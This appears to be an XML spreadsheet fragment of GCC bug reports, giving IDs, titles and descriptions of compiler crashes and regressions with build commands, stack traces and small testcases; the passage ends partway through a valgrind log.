  <si>
    <t>The mawk test suite doesn't pass when I build mawk with gcc 4.3 at
-O3 on mips.  I cannot give you an isolated testcase but I've
narrowed it down so that someone with more experience can take a
look.  I hope one of the two of you (David Richard) can take a look.
Get mawk from upstream or Debian and compile it normally.  If you do:
cp mawk test/mawk
cd test
./mawk -f ../examples/decl.awk mawktest.dat | cmp -s - decl-awk.out  echo $?
cd ..
you'll see that it works.
Now do:
cd rexp
/usr/lib/gcc-snapshot/bin/gcc -g -Wall -O3 -DMAWK -I.. -c -o rexp0.o rexp0.c
cd ..
rm mawk
make mawk
and run the test above again and you'll see it fails.  It fails because
the whitespace is different e.g.
-hash: function returning unsigned (extern)
+hash: function returning  unsigned  (extern)
OK we so know that something in rexp0.c doesn't work at -O3.
Unfortunately at this point I don't have enough experience to
investigate further.  I found out one more thing though.  The
testsuite works again (when rexp0.c is compiled with -O3) if you
apply the following patch:
+++ rexp/rexp0.c     2007-12-07 18:54:03.000000000 +0000
@@ -687 +687 @@
 /* static functions */
 int PROTO(do_str (int char ** MACHINE *)) 
 int PROTO(do_class (char ** MACHINE *)) 
-static int PROTO(escape (char **)) 
+int PROTO(escape (char **)) 
 static BV *PROTO(store_bvp (BV *)) 
 static int PROTO(ctohex (int)) 
@@ -5767 +5767 @@
   on entry *s -&gt; at the character after the slash
  *-------------------*/
-static int
+int
 escape(start_p)
    char **start_p 
 {
I hope one of you can investigate.  I'm not 100% sure this is a bug
in GCC rather than in mawk but mawk works fine on x86_64 when
compiled with -O3.  I've only seen the testsuite failure on MIPS so
far.</t>
  </si>
  <si>
    <t>GCC-46463</t>
  </si>
  <si>
    <t>[4.6 Regression] FAIL: objc.dg/attributes/method-format-1.m</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 166699 gave
FAIL: objc.dg/attributes/method-format-1.m -fgnu-runtime  (test for warnings line 30)
FAIL: objc.dg/attributes/method-format-1.m -fgnu-runtime  (test for warnings line 34)
FAIL: objc.dg/attributes/method-format-1.m -fgnu-runtime  (test for warnings line 38)
FAIL: objc.dg/attributes/method-format-1.m -fgnu-runtime  (test for warnings line 42)
FAIL: objc.dg/attributes/method-format-1.m -fgnu-runtime (test for excess errors)
Revision 166695 is OK. It may be caused by revision 166698:
http://gcc.gnu.org/ml/gcc-cvs/2010-11/msg00587.html</t>
  </si>
  <si>
    <t>GCC-4365</t>
  </si>
  <si>
    <t>Bug 4228 can be fixed.</t>
  </si>
  <si>
    <t xml:space="preserve"> http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=view&amp;pr=4228&amp;database=gcc 
 The bug 4228 is produced in the file gcc/config/i386/i386.md. I don't 
 know why but if you coment the sections: Convert setcc + movzbl to xor 
 + setcc if operands don't overlap at lines 9598 and 12600 the problem 
 disapears. I supose that this lines are wrong but I'm not sure.
 Ian Blanes.
Release:
unknown</t>
  </si>
  <si>
    <t>arbonline</t>
  </si>
  <si>
    <t>GCC-4447</t>
  </si>
  <si>
    <t>c++ ICE (segfault in mangle.c). Regression from 2.95.x!</t>
  </si>
  <si>
    <t>With the attached code gcc gets an internal compiler error.
The immediate cause is that a null pointer is passed to strlen.
The cc1plus stack trace is
#0  0xff2b6dec in strlen ()
#1  0xc6734 in write_expression (expr=0x3c2570)
    at ../../gcc/gcc/cp/mangle.c:1818
#2  0xc67b4 in write_expression (expr=0x3c259c)
    at ../../gcc/gcc/cp/mangle.c:1831
#3  0xc6ff4 in write_template_arg (node=0x3c2588)
    at ../../gcc/gcc/cp/mangle.c:1941
#4  0xc6624 in write_template_args (args=0x3c2614)
    at ../../gcc/gcc/cp/mangle.c:1740
#5  0xc4458 in write_name (decl=0x3c0af8 ignore_local_scope=0)
    at ../../gcc/gcc/cp/mangle.c:712
#6  0xc5848 in write_type (type=0x3c0a28) at ../../gcc/gcc/cp/mangle.c:1393
#7  0xc6440 in write_bare_function_type (type=0x3c0ea0 
    include_return_type_p=1 decl=0x3c7cd8) at ../../gcc/gcc/cp/mangle.c:1632
#8  0xc4320 in write_encoding (decl=0x3c7cd8) at ../../gcc/gcc/cp/mangle.c:657
#9  0xc7688 in mangle_decl_string (decl=0x3c7cd8)
    at ../../gcc/gcc/cp/mangle.c:623
#10 0xc7940 in mangle_decl (decl=0x3c7cd8) at ../../gcc/gcc/cp/mangle.c:2200
See http://gcc.gnu.org/ml/gcc-bugs/2001-10/msg00043.html
for a first attempt at an analysis.
Release:
3.0.2 20011002 (prerelease)
Environment:
System: SunOS atrus 5.7 Generic_106541-12 sun4u sparc SUNWUltra-Enterprise
Architecture: sun4
host: sparc-sun-solaris2.7
build: sparc-sun-solaris2.7
target: sparc-sun-solaris2.7
configured with: ../gcc/configure --prefix=/u/jbuck/gcc-cvs
How-To-Repeat:
This simplified example is based on code for efficient fixed-point
arithmetic.  To get the crash do
gcc -c crash.ii
where crash.ii is
-------------------------------
template
class T {
public:
    T(int)
}
template
T 
func(T a T b) {
    return T&lt;(B1
}
void foo(T a Tb) {
    func(a b)
}
-------------------------------</t>
  </si>
  <si>
    <t>GCC-7028</t>
  </si>
  <si>
    <t>compilation failure of g++ 3.1 with -O3 works with -O2</t>
  </si>
  <si>
    <t>g++ fails to compile a file with -O3 (but works with -O2):
% 
### g++ (v 3.1) works with -O2 but not -O3: see output below
### (file dll_main.ii created with g++ -save-temps from dll_main.cpp
### from the stlport package included in the openoffice-1.0 distribuiton)
% 
% g++ -v -c -O2 dll_main.ii
Reading specs from /usr/local/gcc/gcc-3.1/lib/gcc-lib/sparc-sun-solaris2.6/3.1/specs
Configured with: ../gcc-3.1-static-bimbo2.6/configure --prefix=/usr/local/gcc/gcc-3.1 --disable-shared --with-gnu-as --with-as=/usr/local/bin/as --with-gnu-ld --with-ld=/usr/local/bin/ld --enable-threads --with-cpu=supersparc --enable-cpp --enable-version-specific-runtime-libs --disable-nls
Thread model: posix
gcc version 3.1
 /usr/local/gcc/gcc-3.1/lib/gcc-lib/sparc-sun-solaris2.6/3.1/cc1plus -fpreprocessed dll_main.ii -quiet -dumpbase dll_main.ii -O2 -version -o /var/tmp//ccBGl0gq.s
GNU CPP version 3.1 (cpplib) (sparc ELF)
GNU C++ version 3.1 (sparc-sun-solaris2.6)
	compiled by GNU C version 3.1.
 /usr/local/bin/as --traditional-format -V -Qy -s -o dll_main.o /var/tmp//ccBGl0gq.s
GNU assembler version 2.12 (sparc-sun-solaris2.6) using BFD version 2.12
% 
% g++ -v -c -O3 dll_main.ii
Reading specs from /usr/local/gcc/gcc-3.1/lib/gcc-lib/sparc-sun-solaris2.6/3.1/specs
Configured with: ../gcc-3.1-static-bimbo2.6/configure --prefix=/usr/local/gcc/gcc-3.1 --disable-shared --with-gnu-as --with-as=/usr/local/bin/as --with-gnu-ld --with-ld=/usr/local/bin/ld --enable-threads --with-cpu=supersparc --enable-cpp --enable-version-specific-runtime-libs --disable-nls
Thread model: posix
gcc version 3.1
 /usr/local/gcc/gcc-3.1/lib/gcc-lib/sparc-sun-solaris2.6/3.1/cc1plus -fpreprocessed dll_main.ii -quiet -dumpbase dll_main.ii -O3 -version -o /var/tmp//cco0REuX.s
GNU CPP version 3.1 (cpplib) (sparc ELF)
GNU C++ version 3.1 (sparc-sun-solaris2.6)
	compiled by GNU C version 3.1.
../stlport/stl/debug/_debug.c: In static member function `static void 
   _STL::__stl_debug_engine::_Assert(const char* const char* int) 
   [with _Dummy = bool]':
../stlport/stl/_alloc.h:359:   instantiated from `void _STL::allocator::deallocate(_Tp* unsigned int) const [with _Tp = char]'
../stlport/stl/_string.h:124:   instantiated from `void _STL::_String_base::_M_deallocate_block() [with _Tp = char _Alloc = _STL::allocator]'
../stlport/stl/_string.h:135:   instantiated from `void _STL::_String_base::_String_base() [with _Tp = char _Alloc = _STL::allocator]'
../stlport/stl/_string.h:302:   instantiated from `void _STL::basic_string::basic_string() [with _CharT = char _Traits = _STL::char_traits _Alloc = _STL::allocator]'
../stlport/stl/_numpunct.h:62:   instantiated from here
../stlport/stl/debug/_debug.c:246: `va_start' used in function with fixed args
../stlport/stl/debug/_debug.c: In member function `void 
   _STL::allocator::deallocate(_Tp* unsigned int) const [with _Tp = 
   char]':
../stlport/stl/_string.h:124:   instantiated from `void _STL::_String_base::_M_deallocate_block() [with _Tp = char _Alloc = _STL::allocator]'
../stlport/stl/_string.h:135:   instantiated from `void _STL::_String_base::_String_base() [with _Tp = char _Alloc = _STL::allocator]'
../stlport/stl/_string.h:302:   instantiated from `void _STL::basic_string::basic_string() [with _CharT = char _Traits = _STL::char_traits _Alloc = _STL::allocator]'
../stlport/stl/_numpunct.h:62:   instantiated from here
../stlport/stl/debug/_debug.c:246: `va_start' used in function with fixed args
../stlport/stl/debug/_debug.c: In member function `void _STL::_String_base&lt;_Tp 
   _Alloc&gt;::_M_deallocate_block() [with _Tp = char _Alloc = 
   _STL::allocator]':
../stlport/stl/_string.h:135:   instantiated from `void _STL::_String_base::_String_base() [with _Tp = char _Alloc = _STL::allocator]'
../stlport/stl/_string.h:302:   instantiated from `void _STL::basic_string::basic_string() [with _CharT = char _Traits = _STL::char_traits _Alloc = _STL::allocator]'
../stlport/stl/_numpunct.h:62:   instantiated from here
../stlport/stl/debug/_debug.c:246: `va_start' used in function with fixed args
../stlport/stl/debug/_debug.c: In destructor `void _STL::_String_base&lt;_Tp 
   _Alloc&gt;::_String_base() [with _Tp = char _Alloc = _STL::allocator]':
../stlport/stl/debug/_debug.c:246:   instantiated from `void _STL::_String_base::_String_base() [with _Tp = char _Alloc = _STL::allocator]'
../stlport/stl/_string.h:302:   instantiated from `void _STL::basic_string::basic_string() [with _CharT = char _Traits = _STL::char_traits _Alloc = _STL::allocator]'
../stlport/stl/_numpunct.h:62:   instantiated from here
../stlport/stl/debug/_debug.c:246: `va_start' used in function with fixed args
../stlport/stl/debug/_debug.c: In destructor `void _STL::basic_string&lt;_CharT 
   _Traits _Alloc&gt;::basic_string() [with _CharT = char _Traits = 
   _STL::char_traits _Alloc = _STL::allocator]':
../stlport/stl/debug/_debug.c:246:   instantiated from `void _STL::basic_string::basic_string() [with _CharT = char _Traits = _STL::char_traits _Alloc = _STL::allocator]'
../stlport/stl/_numpunct.h:62:   instantiated from here
../stlport/stl/debug/_debug.c:246: `va_start' used in function with fixed args
%
Release:
gcc-3.1
Environment:
Sun SPARC Solaris2.6
How-To-Repeat:
g++ -c -O3 dll_main.ii</t>
  </si>
  <si>
    <t>GCC-31794</t>
  </si>
  <si>
    <t>Problem while compiling gcc for m32c-elf</t>
  </si>
  <si>
    <t>Hello
there seems to be a gcc problem with the target 'm32c-elf':
/home/mstein/sim/m32c-elf/build/./gcc/xgcc -B/home/mstein/sim/m32c-elf/build/./gcc/ -B/n/07/mstein/cross-local/m32c-elf/m32c-elf/bin/ -B/n/07/mstein/cross-local/m32c-elf/m32c-elf/lib/ -isystem /n/07/mstein/cross-local/m32c-elf/m32c-elf/include -isystem /n/07/mstein/cross-local/m32c-elf/m32c-elf/sys-include -O2 -g -O2 -mcpu=m32cm -O2  -O2 -g -O2  -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc  -I. -I. -I../../.././gcc -I/n/07/mstein/svn/trunk/libgcc -I/n/07/mstein/svn/trunk/libgcc/. -I/n/07/mstein/svn/trunk/libgcc/../gcc -I/n/07/mstein/svn/trunk/libgcc/../include  -o unwind-dw2.o -MT unwind-dw2.o -MD -MP -MF unwind-dw2.dep -fexceptions -c /n/07/mstein/svn/trunk/libgcc/../gcc/unwind-dw2.c 
/n/07/mstein/combined-trunk/libgcc/../gcc/unwind-dw2.c: In function 'execute_cfa_program':
/n/07/mstein/combined-trunk/libgcc/../gcc/unwind-dw2.c:1100: error: unrecognizable insn:
(insn 83 82 84 3 /n/07/mstein/combined-trunk/libgcc/../gcc/unwind-dw2.c:874 (parallel [
            (set (reg:PSI 133)
                (lshiftrt:PSI (reg:PSI 134)
                    (neg:QI (const_int -31 [0xffffffe1]))))
            (clobber (scratch:HI))
        ]) -1 (nil)
    (nil))
/n/07/mstein/combined-trunk/libgcc/../gcc/unwind-dw2.c:1100: internal compiler error: in extract_insn at recog.c:2119
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[4]: *** [unwind-dw2.o] Error 1
The SVN revision was 124341.</t>
  </si>
  <si>
    <t>GCC-13475</t>
  </si>
  <si>
    <t>[3.3 Regression] ICE on SIMD variables with partial value initialization</t>
  </si>
  <si>
    <t>The following code crashes the GCC 3.3.2 compiler when variable 'a' is
initialized with an incomplete list of values. Normally the rest of the values
in a structure are assumed to be zeroed if left unspecified. The compiler does
not crash if the {1} below is edited to a {0}. The crash appears to happen
regardless of the -march or -mcpu setting.
typedef int v8qi __attribute__((mode(V8QI)))
int main()
{
  v8qi a={1}
}
Compiling displays the following:
simd.c: In function `main':
simd.c:5: warning: unused variable `a'
simd.c:5: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>gandalf</t>
  </si>
  <si>
    <t>GCC-41893</t>
  </si>
  <si>
    <t>ICE with -combine and debug</t>
  </si>
  <si>
    <t>[From https://bugzilla.redhat.com/show_bug.cgi?id=531385 ]
Testcase:
cat &gt; file1.c &lt;&lt; EOF
struct s1_s {
    int v
}
struct s1_s g1
void __attribute__((externally_visible)) func1() {
    struct s1_s *l1 = 
}
EOF
cat &gt; file2.c &lt;&lt; EOF
extern struct s1_s g1
void func2() {
}
EOF
cc -O -g -fwhole-program -combine -c file1.c file2.c
Caused by SVN r152403:
        PR debug/41404
        PR debug/41353
        * cfgexpand.c (expand_debug_expr) : Don't create
        CONST_STRING if STRING_CST contains embedded '\0's or doesn't end with
        '\0'.
        (expand_debug_expr) : For TREE_STATIC !DECL_EXTERNAL
        vars use DECL_RTL with resetting it back to NULL afterwards.
        * dwarf2out.c (same_dw_val_p): For dw_val_class_addr compare with
        rtx_equal_p instead of asserting it is a SYMBOL_REF.
        (value_format): For dw_val_class_addr only use DW_FORM_addr if
        the attribute type allows it otherwise use DW_FORM_dataN.
        (mem_loc_descriptor): Handle CONST_STRING.
        (add_const_value_attribute): Handle CONST_STRING using add_AT_addr.
        Handle MEM with CONST_STRING address using add_AT_string.
        (rtl_for_decl_init): Return MEM with CONST_STRING address instead of
        CONST_STRING for const arrays initialized with a string literal.
        (resolve_one_addr resolve_addr_in_expr resolve_addr): New functions.
        (dwarf2out_finish): Call resolve_addr.
        * gcc.dg/guality/pr41404-1.c: New test.
        * gcc.dg/guality/pr41353-2.c: New test.</t>
  </si>
  <si>
    <t>GCC-63744</t>
  </si>
  <si>
    <t>[4.8/4.9/5 Regression] Duplicate use-statement causes error</t>
  </si>
  <si>
    <t>Hi
(I guess this is related to PR34657)
The following snippet is accepted by gfortran
-- test-ok.f90
MODULE MOO
    INTEGER :: S
END MODULE MOO
SUBROUTINE S1
    USE MOO ONLY: X =&gt; S X =&gt; S
    X = 1
END SUBROUTINE S1
-- end of test-ok.f90
but it is rejected if the program unit SUBROUTINE S1 is renamed to SUBROUTINE S
as shown below
-- test.f90
MODULE MOO
    INTEGER :: S
END MODULE MOO
SUBROUTINE S
    USE MOO ONLY: X =&gt; S X =&gt; S
    X = 1
END SUBROUTINE S
-- end of test.f90
$ gfortran -c test.f90
test.f90:6.8:
    USE MOO ONLY: X =&gt; S X =&gt; S
        1
Error: 's' of module 'moo' imported at (1) is also the name of the current program unit
test.f90:8.5:
    X = 1
     1
Error: Name 'x' at (1) is an ambiguous reference to 's' from module 'moo'
Removing the second rename lets the code be accepted.
  USE MOO ONLY: X =&gt; S
A similar behaviour is observed if we have two repeated USE-statements rather than two repeated rename's in the rename-list
  USE MOO ONLY: X =&gt; S
  USE MOO ONLY: X =&gt; S
Kind regards</t>
  </si>
  <si>
    <t>GCC-79498</t>
  </si>
  <si>
    <t>[7 Regression] ICE in df_insn_delete at df-scan.c:948</t>
  </si>
  <si>
    <t>Version 7 gives an ICE for testsuite file pr78526.c
in combination with -mcmodel=large and -Os -O2 or higher :
$ gcc-7-20170212 -O2 -mcmodel=large -c pr78526.c
pr78526.c: In function 'bar':
pr78526.c:11:1: warning: AVX512F vector return without AVX512F enabled changes the ABI [-Wpsabi]
 {
 ^
pr78526.c: In function 'foo':
pr78526.c:18:1: note: The ABI for passing parameters with 64-byte alignment has changed in GCC 4.6
 foo (U u)
 ^~~
pr78526.c:18:1: warning: AVX512F vector argument without AVX512F enabled changes the ABI [-Wpsabi]
pr78526.c:21:1: internal compiler error: in df_insn_delete at df-scan.c:948
 }
 ^
0x82e90c df_insn_delete(rtx_insn*)
        ../../gcc/df-scan.c:948
0x7d5a87 delete_insn(rtx_insn*)
        ../../gcc/cfgrtl.c:169
0x7d5bb6 delete_insn_and_edges(rtx_insn*)
        ../../gcc/cfgrtl.c:231
0x12af85d delete_trivially_dead_insns(rtx_insn* int)
        ../../gcc/cse.c:7146
0x12c962b fwprop_done
        ../../gcc/fwprop.c:1451
0x12cc31f fwprop_addr
        ../../gcc/fwprop.c:1552
0x12cc31f execute
        ../../gcc/fwprop.c:1580</t>
  </si>
  <si>
    <t>GCC-17308</t>
  </si>
  <si>
    <t>nonnull attribute not as useful as it could be</t>
  </si>
  <si>
    <t>The nonnull function attribute seems to recognize only null values which are
explicitly passed to the marked function.  It would be helpful if deduced values
are also reported.  Example:
void *f(void *p) __attribute__((nonnull(1)))
void *bar(void *p)
{
  if (p == (void *) 0) return f(p)
  return p
}
There compiler knows that p is NULL in the call of f.  The generated code proves
it.  Still no warning.
I see the same behavior with gcc 3.5.</t>
  </si>
  <si>
    <t>GCC-79936</t>
  </si>
  <si>
    <t>[7 Regression] ICE with -Walloc-size-larger-than=32767</t>
  </si>
  <si>
    <t>Created attachment 40902
system-generated crash report
Found when compiling my fork of emacs:
$ make sha256.o V=1
/usr/local/bin/gcc -DHAVE_CONFIG_H -D_IN_GNULIB -I. -I../src  -I. -I/Users/ericgallager/emacs/lib -I../src -I/Users/ericgallager/emacs/src -DMAC_OSX=1   -DXASSERTS=1  -fno-common -Wabi -Waddress -Waggressive-loop-optimizations -Wall -Wattributes -Wbool-compare -Wbuiltin-macro-redefined -Wcast-align -Wchar-subscripts -Wchkp -Wclobbered -Wcomment -Wcoverage-mismatch -Wcpp -Wdate-time -Wdeprecated -Wdeprecated-declarations -Wdesignated-init -Wdisabled-optimization -Wdiscarded-array-qualifiers -Wdiscarded-qualifiers -Wdiv-by-zero -Wduplicated-cond -Wempty-body -Wendif-labels -Wenum-compare -Wextra -Wformat-contains-nul -Wformat-extra-args -Wformat-security -Wformat-y2k -Wformat-zero-length -Wframe-address -Wfree-nonheap-object -Whsa -Wimplicit -Wimplicit-function-declaration -Wimplicit-int -Wincompatible-pointer-types -Winit-self -Wint-conversion -Wint-to-pointer-cast -Winvalid-memory-model -Winvalid-pch -Wjump-misses-init -Wlogical-not-parentheses -Wmain -Wmaybe-uninitialized -Wmemset-transposed-args -Wmisleading-indentation -Wmissing-braces -Wmissing-declarations -Wmissing-include-dirs -Wmissing-parameter-type -Wmissing-prototypes -Wmultichar -Wnarrowing -Wnonnull -Wnonnull-compare -Wnull-dereference -Wold-style-declaration -Wold-style-definition -Woverflow -Woverlength-strings -Woverride-init -Wpacked -Wpacked-bitfield-compat -Wparentheses -Wpointer-arith -Wpointer-sign -Wpointer-to-int-cast -Wpragmas -Wreturn-local-addr -Wreturn-type -Wscalar-storage-order -Wsequence-point -Wshift-count-negative -Wshift-count-overflow -Wshift-negative-value -Wsizeof-array-argument -Wsizeof-pointer-memaccess -Wstrict-aliasing -Wstrict-prototypes -Wsuggest-attribute=format -Wsuggest-attribute=noreturn -Wsuggest-final-methods -Wsuggest-final-types -Wswitch-bool -Wtautological-compare -Wtrampolines -Wtrigraphs -Wuninitialized -Wunknown-pragmas -Wunsafe-loop-optimizations -Wunused -Wunused-but-set-parameter -Wunused-but-set-variable -Wunused-function -Wunused-label -Wunused-local-typedefs -Wunused-result -Wunused-value -Wunused-variable -Wvarargs -Wvariadic-macros -Wvector-operation-performance -Wvolatile-register-var -Wwrite-strings -Warray-bounds=2 -Wnormalized=nfc -Wshift-overflow=2 -Wunused-const-variable=2 -Wno-missing-field-initializers -Wno-sign-compare -Wno-type-limits -Wno-switch -Wno-unused-parameter -Wno-format-nonliteral -Wno-logical-op -Wnonportable-cfstrings -Wstrict-overflow=1 -Wdeclaration-after-statement -Wmissing-noreturn -Wunreachable-code -Woverride-init-side-effects -Wshift-overflow=2 -Wdangling-else -Wduplicate-decl-specifier -Wmemset-elt-size -Wswitch-unreachable -Wimplicit-fallthrough -Wformat-overflow=2 -Wformat-truncation=2 -Wstringop-overflow=2 -Wexpansion-to-defined -Wrestrict -Wint-in-bool-context -Wpointer-compare -Wbool-operation -Wduplicated-branches -Walloca-larger-than=16384 -Wvla-larger-than=16384 -Walloc-size-larger-than=32767 -Walloc-zero -Wpsabi -Wbuiltin-declaration-mismatch   -ggdb3 -Og -gdwarf-2 -gfull -mfix-and-continue -MT sha256.o -MD -MP -MF .deps/sha256.Tpo -c -o sha256.o sha256.c
sha256.c: In function 'sha256_stream':
sha256.c:181:9: warning: argument 1 value '32840' exceeds maximum object size 32767 [-Walloc-size-larger-than=]
   char *buffer = malloc (BLOCKSIZE + 72)
         ^~~~~~
In file included from ./stdlib.h:36:0
                 from ../src/conf_post.h:226
                 from ../src/config.h:3616
                 from sha256.c:23:
/usr/include/stdlib.h:169:7: note: in a call to allocation function 'malloc' declared here
 void *malloc(size_t)
       ^~~~~~
sha256.c: In function 'sha224_stream':
sha256.c:252:9: internal compiler error: tree check: expected tree that contains 'typed' structure have 'block' in extended_tree at tree.h:5286
   char *buffer = malloc (BLOCKSIZE + 72)
         ^~~~~~
sha256.c:252:9: internal compiler error: Abort trap
gcc: internal compiler error: Abort trap (program cc1)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [sha256.o] Error 4
Interestingly the ICE seems to go away when I try to save the preprocessed source to attach to this bug:
$ /usr/local/bin/gcc -DHAVE_CONFIG_H -D_IN_GNULIB -I. -I../src  -I. -I/Users/ericgallager/emacs/lib -I../src -I/Users/ericgallager/emacs/src -DMAC_OSX=1   -DXASSERTS=1  -fno-common -Wabi -Waddress -Waggressive-loop-optimizations -Wall -Wattributes -Wbool-compare -Wbuiltin-macro-redefined -Wcast-align -Wchar-subscripts -Wchkp -Wclobbered -Wcomment -Wcoverage-mismatch -Wcpp -Wdate-time -Wdeprecated -Wdeprecated-declarations -Wdesignated-init -Wdisabled-optimization -Wdiscarded-array-qualifiers -Wdiscarded-qualifiers -Wdiv-by-zero -Wduplicated-cond -Wempty-body -Wendif-labels -Wenum-compare -Wextra -Wformat-contains-nul -Wformat-extra-args -Wformat-security -Wformat-y2k -Wformat-zero-length -Wframe-address -Wfree-nonheap-object -Whsa -Wimplicit -Wimplicit-function-declaration -Wimplicit-int -Wincompatible-pointer-types -Winit-self -Wint-conversion -Wint-to-pointer-cast -Winvalid-memory-model -Winvalid-pch -Wjump-misses-init -Wlogical-not-parentheses -Wmain -Wmaybe-uninitialized -Wmemset-transposed-args -Wmisleading-indentation -Wmissing-braces -Wmissing-declarations -Wmissing-include-dirs -Wmissing-parameter-type -Wmissing-prototypes -Wmultichar -Wnarrowing -Wnonnull -Wnonnull-compare -Wnull-dereference -Wold-style-declaration -Wold-style-definition -Woverflow -Woverlength-strings -Woverride-init -Wpacked -Wpacked-bitfield-compat -Wparentheses -Wpointer-arith -Wpointer-sign -Wpointer-to-int-cast -Wpragmas -Wreturn-local-addr -Wreturn-type -Wscalar-storage-order -Wsequence-point -Wshift-count-negative -Wshift-count-overflow -Wshift-negative-value -Wsizeof-array-argument -Wsizeof-pointer-memaccess -Wstrict-aliasing -Wstrict-prototypes -Wsuggest-attribute=format -Wsuggest-attribute=noreturn -Wsuggest-final-methods -Wsuggest-final-types -Wswitch-bool -Wtautological-compare -Wtrampolines -Wtrigraphs -Wuninitialized -Wunknown-pragmas -Wunsafe-loop-optimizations -Wunused -Wunused-but-set-parameter -Wunused-but-set-variable -Wunused-function -Wunused-label -Wunused-local-typedefs -Wunused-result -Wunused-value -Wunused-variable -Wvarargs -Wvariadic-macros -Wvector-operation-performance -Wvolatile-register-var -Wwrite-strings -Warray-bounds=2 -Wnormalized=nfc -Wshift-overflow=2 -Wunused-const-variable=2 -Wno-missing-field-initializers -Wno-sign-compare -Wno-type-limits -Wno-switch -Wno-unused-parameter -Wno-format-nonliteral -Wno-logical-op -Wnonportable-cfstrings -Wstrict-overflow=1 -Wdeclaration-after-statement -Wmissing-noreturn -Wunreachable-code -Woverride-init-side-effects -Wshift-overflow=2 -Wdangling-else -Wduplicate-decl-specifier -Wmemset-elt-size -Wswitch-unreachable -Wimplicit-fallthrough -Wformat-overflow=2 -Wformat-truncation=2 -Wstringop-overflow=2 -Wexpansion-to-defined -Wrestrict -Wint-in-bool-context -Wpointer-compare -Wbool-operation -Wduplicated-branches -Walloca-larger-than=16384 -Wvla-larger-than=16384 -Walloc-size-larger-than=32767 -Walloc-zero -Wpsabi -Wbuiltin-declaration-mismatch   -ggdb3 -Og -gdwarf-2 -gfull -mfix-and-continue -MT sha256.o -MD -MP -MF .deps/sha256.Tpo -save-temps -freport-bug -c -o sha256.o sha256.c
sha256.c: In function 'sha256_stream':
sha256.c:181:9: warning: argument 1 value '32840' exceeds maximum object size 32767 [-Walloc-size-larger-than=]
   char *buffer = malloc (BLOCKSIZE + 72)
         ^~~~~~
In file included from ./stdlib.h:36:0
                 from ../src/conf_post.h:226
                 from ../src/config.h:3616
                 from sha256.c:23:
/usr/include/stdlib.h:169:7: note: in a call to allocation function 'malloc' declared here
 void *malloc(size_t)
       ^~~~~~
sha256.c: In function 'sha224_stream':
sha256.c:252:9: warning: argument 1 value '32840' exceeds maximum object size 32767 [-Walloc-size-larger-than=]
   char *buffer = malloc (BLOCKSIZE + 72)
         ^~~~~~
In file included from ./stdlib.h:36:0
                 from ../src/conf_post.h:226
                 from ../src/config.h:3616
                 from sha256.c:23:
/usr/include/stdlib.h:169:7: note: in a call to allocation function 'malloc' declared here
 void *malloc(size_t)
       ^~~~~~
The file being compiled sha256.c is from gnulib commit 94d81adc2f56c048b7872cd8ae2dd8568aef6dcf.
gcc version info:
$ /usr/local/bin/gcc -v
Using built-in specs.
COLLECT_GCC=/usr/local/bin/gcc
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-apple-darwin10.8.0/7.0.1/lto-wrapper
Target: x86_64-apple-darwin10.8.0
Configured with: ../configure --disable-werror --disable-werror-always --enable-languages=cc++objcobj-c++lto --enable-stage1-checking=releasertl -C --with-system-libunwind --enable-secureplt --enable-frame-pointer --enable-debug --without-isl --disable-host-shared --enable-maintainer-mode --disable-default-pie --with-ld64 --without-pic --enable-target-optspace --disable-nls --with-system-zlib --with-libiconv-prefix=/opt/local --with-gmp=/opt/local --with-mpfr=/opt/local --with-mpc=/opt/local --enable-lto --enable-libstcxx-time --with-build-config=bootstrap-debug --with-as=/opt/local/bin/as --with-ld=/opt/local/bin/ld --with-ar=/opt/local/bin/ar --enable-objc-gc --enable-libada --enable-libssp CC=/opt/local/bin/gcc CXX=/opt/local/bin/g++ AR_FOR_TARGET=/opt/local/bin/ar AS_FOR_TARGET=/opt/local/bin/as LD_FOR_TARGET=/opt/local/bin/ld NM_FOR_TARGET=/opt/local/bin/nm RANLIB_FOR_TARGET=/opt/local/bin/ranlib STRIP_FOR_TARGET=/opt/local/bin/strip OTOOL=/opt/local/bin/otool OTOOL64=/opt/local/bin/otool AUTOCONF=/opt/local/bin/autoconf264 AUTOHEADER=/opt/local/bin/autoheader264 AUTOM4TE=/opt/local/bin/autom4te264 AUTORECONF=/opt/local/bin/autoreconf264 AUTOSCAN=/opt/local/bin/autoscan264 AUTOUPDATE=/opt/local/bin/autoupdate264 IFNAMES=/opt/local/bin/ifnames264 ACLOCAL=/sw/bin/aclocal-1.11 PERL=/opt/local/bin/perl
Thread model: posix
gcc version 7.0.1 20170301 (experimental) (GCC) 
cc-ing Martin because he introduced -Walloc-size-larger-than</t>
  </si>
  <si>
    <t>egall</t>
  </si>
  <si>
    <t>GCC-19419</t>
  </si>
  <si>
    <t>Overlapping memcpy with array slices</t>
  </si>
  <si>
    <t>Originally noted in [Bug middle-end/19410] but seems to be a different 
problem (maybe front-end). 
RUN cxa4020 
==24948== Memcheck a memory error detector for x86-linux. 
==24948== Copyright (C) 2002-2004 and GNU GPL'd by Julian Seward et al. 
==24948== Using valgrind-2.3.0.CVS a program supervision framework for 
x86-linux. 
==24948== Copyright (C) 2000-2004 and GNU GPL'd by Julian Seward et al. 
==24948== For more details rerun with: -v 
==24948== 
.. CXA4020 ACATS 2.5 05-01-11 17:13:16 
---- CXA4020 Check that the subprograms defined in package 
                Ada.Strings.Wide_Bounded are available and that they 
                produce correct results especially under conditions 
                where truncation of the result is required. 
==24948== Source and destination overlap in memcpy(0x52BFC8F8 0x52BFC8FC 8) 
==24948==    at 0x1B906AC5: memcpy (mac_replace_strmem.c:113) 
==24948==    by 0x805CABC: ada__strings__wide_superbounded__super_trim__4 
(a-stwisu.adb:1664) 
==24948==    by 0x8068805: cxa4020__test_block__b10__trim__4.1007 
(a-stwibo.ads:810) 
==24948==    by 0x806ABF6: _ada_cxa4020 (cxa4020.adb:396) 
==24948== 
==24948== Source and destination overlap in memcpy(0x52BFC8F8 0x52BFC8FC 12) 
==24948==    at 0x1B906AC5: memcpy (mac_replace_strmem.c:113) 
